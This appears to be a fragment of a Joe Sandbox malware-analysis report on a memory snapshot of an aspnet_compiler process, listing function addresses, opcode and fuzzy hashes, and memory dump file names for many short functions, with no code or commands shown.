                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                    • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                    • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                    • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                    Function 00A6FA50 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                    • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                    • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                    • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                    Function 00A6FBB8 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                    Function 00A6FBE8 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                    • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                    • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                    • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                    Function 00A6FB50 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                    Function 00A6FC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Function 00A6FC30 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                    • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                    • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                    • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                    Function 00A6FC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Function 00A6FC48 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                    • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                    • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                    • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                    Function 00A71D80 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                    • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                    • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                    • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                    Function 00A6FD8C Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                    Function 00A6FD5C Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                    • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                    • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                    • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                    Function 00A6FEA0 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                    Function 00A6FED0 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                    Function 00A6FE24 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                    • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                    • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                    • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                    Function 00A6FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                    Function 00A6FFFC Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                    • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                    • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                    • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                    Function 00A6FF34 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                    • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                    • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
